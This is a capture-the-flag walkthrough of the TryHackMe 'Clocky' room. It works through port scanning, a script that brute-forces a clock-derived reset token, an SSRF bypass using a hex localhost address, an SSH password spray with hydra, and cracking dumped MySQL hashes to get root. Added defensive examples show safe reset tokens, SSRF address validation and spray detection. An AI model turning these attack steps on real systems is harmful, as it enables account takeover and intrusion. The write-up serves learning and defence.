Task 1 Pwn the Clock and Gain Root Access
- What is flag 1?
THM{REDACTED}
- What is flag 2?
THM{REDACTED}
- What is flag 3?
THM{REDACTED}
- What is flag 4?
THM{REDACTED}
- What is flag 5?
THM{REDACTED}
- What is flag 6?
THM{REDACTED}
Enumeration
hengkisirait: Clocky $ nmap -T4 -Pn 10.10.236.199
22/tcp open ssh syn-ack
80/tcp open http syn-ack
8000/tcp open http-alt syn-ack
8080/tcp open http-proxy syn-ack
The robots.txt on the web service lists the file extensions worth fuzzing for:
User-agent: *
Disallow: /*.sql$
Disallow: /*.zip$
Disallow: /*.bak$
Flag 1: THM{REDACTED}
hengkisirait: Clocky $ gobuster dir -u http://10.10.236.199:8000 -w ~/HackTools/directory-list-2.3-medium.txt -x "sql,zip,bak,txt"
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.236.199:8000
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /Users/hengkisirait/HackTools/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Extensions: sql,zip,bak,txt
[+] Timeout: 10s
===============================================================
2024/04/01 22:00:48 Starting gobuster in directory enumeration mode
===============================================================
/index.zip (Status: 200) [Size: 1922]
- Extract the zip, analyze app.py, and write a Python script to brute-force the password-reset token
```python
#!/usr/bin/env python3
import requests
import hashlib
import datetime

forgot_pass = "http://10.10.236.199:8080/forgot_password"
reset_pass = "http://10.10.236.199:8080/password_reset?token="

fp_data = {
    'username': 'administrator'
}
# Trigger the reset so the server generates a token "now"
fp = requests.post(forgot_pass, data=fp_data)

# Splitting to get the time from the server's Date header,
# e.g. "Mon, 01 Apr 2024 22:00:48 GMT" -> index 4 is "22:00:48"
time = fp.headers['Date'].split(' ')

# Splitting datetime.now() to get the date part (YYYY-MM-DD)
value = str(datetime.datetime.now()).split(" ")[0]


def resetPassword(token):
    rp = requests.get(reset_pass + token)
    if "Invalid token" not in rp.text:
        print(f"[+] Found Token: {token}")
        return True
    else:
        print(f"[+] failed {token}")
        return False


# Brute the two digits after the second: the token is the SHA-1 of
# "YYYY-MM-DD HH:MM:SS.xx . ADMINISTRATOR", and only "xx" is unknown
for milli_seconds in range(100):
    ms = f"{milli_seconds:02}"
    full_time = value + " " + time[4] + "." + ms
    lnk = full_time + " . ADMINISTRATOR"
    token = hashlib.sha1(lnk.encode("utf-8")).hexdigest()
    if resetPassword(token):
        break
```
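The script above works because the token is a SHA-1 over a timestamp and the username, so at most 100 candidates exist once the server's Date header is known. As an added example (not the room's app.py and not part of the original writeup), here is how a reset token should be issued and checked: 256 bits from a CSPRNG, only its hash stored, a short expiry, single use, and a constant-time comparison. `TOKEN_TTL_SECONDS`, `_reset_store` and the function names are hypothetical; a real app would keep the store in the database's reset_token table.

```python
#!/usr/bin/env python3
"""Added example: issuing and verifying a password-reset token that cannot be
derived from the clock. Hypothetical helper, not the room's app.py."""
import hashlib
import hmac
import secrets
import time
from typing import Dict, Optional, Tuple

TOKEN_TTL_SECONDS = 15 * 60  # assumption: a reset link is valid for 15 minutes

# In-memory stand-in for a reset_token table: username -> (sha256(token), expiry)
_reset_store: Dict[str, Tuple[str, float]] = {}


def issue_reset_token(username: str, now: Optional[float] = None) -> str:
    """Create a random 256-bit token and store only its SHA-256, so a leaked
    database dump (like database.sql above) does not contain usable tokens."""
    now = time.time() if now is None else now
    token = secrets.token_urlsafe(32)  # 43 URL-safe chars, 256 bits of entropy
    digest = hashlib.sha256(token.encode()).hexdigest()
    _reset_store[username] = (digest, now + TOKEN_TTL_SECONDS)
    return token  # goes to the user's mailbox only, never into the HTTP response


def verify_reset_token(username: str, token: str, now: Optional[float] = None) -> bool:
    """Constant-time check against the stored digest, with expiry and single use."""
    now = time.time() if now is None else now
    entry = _reset_store.get(username)
    if entry is None:
        return False
    digest, expires_at = entry
    if now > expires_at:
        _reset_store.pop(username, None)  # expired tokens are discarded
        return False
    candidate = hashlib.sha256(token.encode()).hexdigest()
    if not hmac.compare_digest(candidate, digest):
        return False  # wrong token: leave the entry so the real one still works
    _reset_store.pop(username, None)  # one-shot: consumed on first success
    return True


if __name__ == "__main__":
    t = issue_reset_token("administrator")
    print("issued token (would be e-mailed):", t)
    print("wrong token accepted?", verify_reset_token("administrator", "guess"))
    print("real token accepted?", verify_reset_token("administrator", t))
    print("replay accepted?", verify_reset_token("administrator", t))
```

Compared with the 100-candidate search above, an attacker who knows the exact issue time gains nothing here: the token is independent of the clock, and the hashed-at-rest copy means the dump retrieved later via the SSRF would not have exposed a valid token either.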
Go to http://10.10.236.199:8080/password_reset?token=[TOKEN-HERE] and reset the password.
After resetting it, log in at http://10.10.236.199:8080/administrator with the password you set.
Encode localhost as a hex IP (127.0.0.1 becomes 0x7f000001) and request
http://0x7f000001/database.sql
to retrieve database.sql.
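The hex spelling works because a naive localhost/127.0.0.1 string check never sees the literal it is looking for, while the system's IPv4 parser still turns 0x7f000001 into 127.0.0.1. As an added example (not part of the writeup or the room's application), the helper below canonicalises an IPv4 literal the way inet_aton does (hex, octal, bare decimal and short forms such as 127.1), unwraps IPv4-mapped IPv6, resolves hostnames through a pluggable resolver, and refuses anything that is loopback, private, link-local or otherwise non-public before a server-side fetch is made. All names here are hypothetical.

```python
#!/usr/bin/env python3
"""Added example: SSRF destination check that canonicalises IP spellings
before deciding. Hypothetical helper, not the room's code."""
import ipaddress
import re
import socket
from typing import Callable, List, Optional, Union
from urllib.parse import urlsplit

_HEX = re.compile(r"0[xX][0-9a-fA-F]+")
_OCT = re.compile(r"0[0-7]*")       # "0" alone is octal zero, which is fine
_DEC = re.compile(r"[1-9][0-9]*")


def _parse_c_int(part: str) -> int:
    """One dotted component with C/inet_aton rules: 0x.. hex, 0.. octal, else decimal."""
    if _HEX.fullmatch(part):
        return int(part[2:], 16)
    if _OCT.fullmatch(part):
        return int(part, 8)
    if _DEC.fullmatch(part):
        return int(part, 10)
    raise ValueError(part)


def canonical_ipv4(literal: str) -> Optional[ipaddress.IPv4Address]:
    """Return the address inet_aton would produce for `literal`, or None if it
    is not an IPv4 literal in any numeric spelling (e.g. a hostname)."""
    parts = literal.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    try:
        values = [_parse_c_int(p) for p in parts]
    except ValueError:
        return None
    head, last = values[:-1], values[-1]
    if any(v > 0xFF for v in head):
        return None
    remaining = 4 - len(head)          # the last component fills the remaining bytes
    if last >= 1 << (8 * remaining):   # "127.1" -> 127.0.0.1, "2130706433" -> 127.0.0.1
        return None
    packed = 0
    for v in head:
        packed = (packed << 8) | v
    packed = (packed << (8 * remaining)) | last
    return ipaddress.IPv4Address(packed)


def _blocked(addr: Union[ipaddress.IPv4Address, ipaddress.IPv6Address]) -> bool:
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped       # ::ffff:127.0.0.1 is judged as 127.0.0.1
    return (addr.is_loopback or addr.is_private or addr.is_link_local
            or addr.is_reserved or addr.is_multicast or addr.is_unspecified)


def _dns_resolve(host: str) -> List[str]:
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def is_safe_fetch_target(url: str,
                         resolver: Optional[Callable[[str], List[str]]] = None) -> bool:
    """True only for http(s) URLs whose host is, or resolves exclusively to,
    a public address. `resolver` maps hostname -> address strings (default DNS)."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    host = parts.hostname
    v4 = canonical_ipv4(host)
    if v4 is not None:
        return not _blocked(v4)
    try:
        return not _blocked(ipaddress.IPv6Address(host))   # urlsplit strips the []
    except ValueError:
        pass
    resolve = resolver or _dns_resolve
    try:
        addrs = resolve(host)
    except OSError:
        return False
    return bool(addrs) and all(not _blocked(ipaddress.ip_address(a)) for a in addrs)


if __name__ == "__main__":
    for u in ("http://0x7f000001/database.sql", "http://127.1/database.sql",
              "http://[::ffff:127.0.0.1]/database.sql", "http://93.184.216.34/"):
        print(u, "->", "allowed" if is_safe_fetch_target(u) else "blocked")
```

Two design points: the decision is made on the resolved address, never on the string the user typed, and the resolver is injectable so the policy can be unit-tested offline. To close the remaining DNS-rebinding gap, the fetcher should connect to the address that was checked rather than resolving the hostname a second time.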
After analyzing the database, collect every credential found in app.py and database.sql and use them to brute-force SSH. Contents of database.sql:
#################################################
# #
# Flag 4: THM{REDACTED} #
# #
#################################################
CREATE DATABASE IF NOT EXISTS clocky;
USE clocky;
-- CREATE USER IF NOT EXISTS 'clocky_user'@'localhost' IDENTIFIED BY '!WE_LOVE_CLEARTEXT_DB_PASSWORDS!';
-- GRANT ALL PRIVILEGES ON *.* TO 'clocky_user'@'localhost' WITH GRANT OPTION;
-- CREATE USER IF NOT EXISTS 'clocky_user'@'%' IDENTIFIED BY '!WE_LOVE_CLEARTEXT_DB_PASSWORDS!';
-- GRANT ALL PRIVILEGES ON *.* TO 'clocky_user'@'%' WITH GRANT OPTION;
-- FLUSH PRIVILEGES;
-- SET FOREIGN_KEY_CHECKS=0;
DROP TABLE IF EXISTS users;
DROP TABLE IF EXISTS passwords;
/*
DROP TABLE IF EXISTS reset_token;
*/
CREATE TABLE users(
ID INT AUTO_INCREMENT UNIQUE NOT NULL PRIMARY KEY,
username VARCHAR(50) UNIQUE NOT NULL,
Created timestamp default current_timestamp );
INSERT INTO users (username) VALUES ("administrator");
CREATE TABLE passwords(
ID INT AUTO_INCREMENT NOT NULL,
password VARCHAR(256) NOT NULL,
FOREIGN KEY (ID) REFERENCES users(ID) );
INSERT INTO passwords (password) VALUES ("REDACTED");
/* Do we actually need this part anymore?
I've updated app.py to not use this due to brute force errors
CREATE TABLE reset_token(
ID INT AUTO_INCREMENT NOT NULL,
username VARCHAR(50) UNIQUE NOT NULL,
token VARCHAR(128) UNIQUE,
FOREIGN KEY (ID) REFERENCES users(ID) );
### TEST TOKEN ###
INSERT INTO reset_token (username, token) VALUES ("administrator", "WyJhZG1pbmlzdHJhdG9yIl0.hFrZoI0BzkqoI01vfOL13haqpwY");
*/
Brute-force SSH with hydra using the collected usernames and the recovered password:
hengkisirait: Clocky $ hydra -L user.txt -p "REDACTED" 10.10.236.199 ssh
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-04-01 23:11:36
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 4 tasks per 1 server, overall 4 tasks, 4 login tries (l:4/p:1), ~1 try per task
[DATA] attacking ssh://10.10.236.199:22/
[22][ssh] host: 10.10.236.199 login: clarice password: REDACTED
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-04-01 23:11:45
- SSH to the server using the credentials clarice:REDACTED
clarice@clocky:~$ cat flag5.txt
THM{REDACTED}
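The hydra run above is a password spray: one password tried against a list of users from a single source within a few seconds, followed by a successful login. As an added example from the defender's side (not part of the writeup), the detector below parses sshd auth-log lines, flags a source that fails against several distinct accounts inside a short window, and records whether that source later logged in successfully. The log lines, the window and the user threshold are constructed for illustration; the year is assumed because syslog timestamps omit it.

```python
#!/usr/bin/env python3
"""Added example: detecting an SSH password spray in sshd log lines.
The SAMPLE_LOG is constructed, not taken from the target machine."""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Optional, Tuple

SAMPLE_LOG = """\
Apr  1 23:11:36 clocky sshd[1201]: Failed password for invalid user dev from 10.10.14.5 port 51230 ssh2
Apr  1 23:11:36 clocky sshd[1203]: Failed password for invalid user clocky_user from 10.10.14.5 port 51232 ssh2
Apr  1 23:11:37 clocky sshd[1205]: Failed password for root from 10.10.14.5 port 51234 ssh2
Apr  1 23:11:38 clocky sshd[1207]: Accepted password for clarice from 10.10.14.5 port 51236 ssh2
Apr  1 23:20:02 clocky sshd[1300]: Failed password for clarice from 10.10.14.9 port 40000 ssh2
"""

# Matches both "Failed password for invalid user X" and "Accepted password for X"
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)

Event = Tuple[datetime, str, str, str]   # (timestamp, result, user, source ip)


def parse(log: str, year: int = 2024) -> List[Event]:
    """Extract authentication events; `year` is assumed since syslog omits it."""
    events: List[Event] = []
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts_text = " ".join(m["ts"].split())   # collapse the padded day field
        ts = datetime.strptime(f"{year} {ts_text}", "%Y %b %d %H:%M:%S")
        events.append((ts, m["result"], m["user"], m["ip"]))
    return events


def detect_spray(log: str, window: timedelta = timedelta(minutes=5),
                 min_users: int = 3, year: int = 2024) -> Dict[str, dict]:
    """One alert per source IP that failed against >= min_users distinct
    accounts inside `window`; a later Accepted login from that IP is attached."""
    failures: Dict[str, List[Tuple[datetime, str]]] = defaultdict(list)
    alerts: Dict[str, dict] = {}
    for ts, result, user, ip in parse(log, year):
        if result == "Failed":
            failures[ip].append((ts, user))
            recent = [(t, u) for t, u in failures[ip] if ts - t <= window]
            users = {u for _, u in recent}
            if len(users) >= min_users:
                alert = alerts.setdefault(
                    ip, {"first_seen": recent[0][0], "users": [], "success": None})
                alert["users"] = sorted(set(alert["users"]) | users)
        elif result == "Accepted" and ip in alerts and alerts[ip]["success"] is None:
            alerts[ip]["success"] = (ts, user)   # spray followed by a valid login
    return alerts


if __name__ == "__main__":
    for ip, a in detect_spray(SAMPLE_LOG).items():
        print(f"{ip}: sprayed {a['users']} from {a['first_seen']}, success={a['success']}")
```

A threshold of three distinct users in five minutes would have fired on the four logins hydra attempted in nine seconds; the "success" field is what turns the alert into an incident, since a spray that ends in an Accepted line means the reused password worked. Key-only authentication and rate limiting in sshd remove the attack surface entirely, but the log pattern is still worth alerting on.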
Privilege Escalation
╔══════════╣ Analyzing Env Files (limit 70)
-rw-rw-r-- 1 clarice clarice 20 May 21 2023 /home/clarice/app/.env
db=REDACTED
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| clocky |
| information_schema |
| mysql |
| performance_schema |
| sys |
+--------------------+
5 rows in set (0.10 sec)
- Dump the MySQL password hashes (check the MySQL version first, since the hash format and the matching hashcat mode depend on it)
SELECT user,CONCAT('$mysql',LEFT(authentication_string,6),'*',INSERT(HEX(SUBSTR(authentication_string,8)),41,0,'*')) AS hash FROM mysql.user WHERE plugin = 'caching_sha2_password' AND authentication_string NOT LIKE '%INVALIDSALTANDPASSWORD%' AND authentication_string !='';
+------------------+----------------------------------------------------------------------------------------------------------------------------------------------+
| user | hash |
+------------------+----------------------------------------------------------------------------------------------------------------------------------------------+
| clocky_user | $mysql$A$005*077E1B6B675D350F435D5D1C686D12566C08635A*5566386F49543936423756525A68516962735568536535654B62486D344C71316B7338707A78446B4E4D39 |
| dev | $mysql$A$005*0D172F787569054E322523067049563540383D17*6F31786178584431332F4D6830726C6C6F652F5771636D6D6142444D46367237776A764647676F54536142 |
| clocky_user | $mysql$A$005*63671A7C5C3E425E3A0C794352306B531456162B*58774E44786D326C44443557334A39353531676A6C566D4F5A395A39684832537A61696C786D32566B4C2E |
| debian-sys-maint | $mysql$A$005*456268331A4E3561236636480E4D3F78462A7553*716A4E6262555947697444712F79464C4D384C62617544683833517472615161455479366E5A5774576332 |
| dev | $mysql$A$005*1C160A38777C5121134E5D725A58216D5A1D5C3F*6F6B2F577851456465524C4E6771587057456634734A6F6E5A656361774655697A4438466F6B654935462E |
+------------------+----------------------------------------------------------------------------------------------------------------------------------------------+
┌──(lodwig㉿kali)-[~]
└─$ hashcat -m 7401 clock_hash /usr/share/wordlists/rockyou.txt --show
$mysql$A$005*0D172F787569054E322523067049563540383D17*6F31786178584431332F4D6830726C6C6F652F5771636D6D6142444D46367237776A764647676F54536142:REDACTED
clarice@clocky:/dev/shm$ su
Password:
root@clocky:/dev# cd /root
root@clocky:~# ls
flag6.txt snap
root@clocky:~# cat flag6.txt
THM{REDACTED}